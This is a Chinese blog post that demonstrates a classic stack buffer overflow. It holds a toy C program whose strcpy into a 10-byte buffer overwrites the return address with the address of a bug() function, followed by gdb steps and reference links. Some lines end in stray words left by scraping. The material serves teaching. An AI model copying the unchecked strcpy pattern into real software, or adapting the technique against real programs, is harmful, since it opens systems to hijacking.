缓冲区溢出攻击
攻击代码:html
#include "stdio.h"
#include "string.h"
char code[]=
"\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41"
"\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41" // two more added
"\xbe\x05\x40\x00" // bug address
"\x00";
void copy(const char *input)
{
char buf[10];
strcpy(buf,input);
printf("%s \n",buf);
}
void bug(void)
{
printf("I shouldn’t have appeared\n");
}
int main(int argc,char *argv[])
{
copy(code);
return 0;
}
攻击过程:app
1 关闭栈保护编译打开gdb:spa
2 在strcpy和printf两行都设置断点,运行,查看rsp寄存器的值,找到strcpy所在的地址。.net
3 运行后查看,此时变为了bug的地址。code
4 运行程序,达到攻击目的htm
参考资料:blog
http://os.it168.com/a2009/0530/1059/000001059910.shtmlget
http://blog.csdn.net/liigo/article/details/582231input
http://blog.163.com/jw_chen_cs/blog/static/20221214820124119642246/string
相关文章
- 1. 缓冲区溢出攻击
- 2. bufbomb-缓冲区溢出攻击实验
- 3. CSAPP 缓冲区溢出攻击实验
- 4. 缓冲区溢出攻击实战
- 5. 深刻浅出缓冲区溢出攻击
- 6. 缓冲区溢出
- 7. 缓存区溢出攻击实验(1)
- 8. 缓存区溢出攻击实验(3)
- 9. 《CSAPP》实验三:缓冲区溢出攻击
- 10. 缓冲区溢出攻击相关知识
- 更多相关文章...
- • SVN 解决冲突 - SVN 教程
- • PHP 5 时区 - PHP参考手册
- • Git可视化极简易教程 — Git GUI使用方法
- • Flink 数据传输及反压详解
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 缓冲区溢出攻击
- 2. bufbomb-缓冲区溢出攻击实验
- 3. CSAPP 缓冲区溢出攻击实验
- 4. 缓冲区溢出攻击实战
- 5. 深刻浅出缓冲区溢出攻击
- 6. 缓冲区溢出
- 7. 缓存区溢出攻击实验(1)
- 8. 缓存区溢出攻击实验(3)
- 9. 《CSAPP》实验三:缓冲区溢出攻击
- 10. 缓冲区溢出攻击相关知识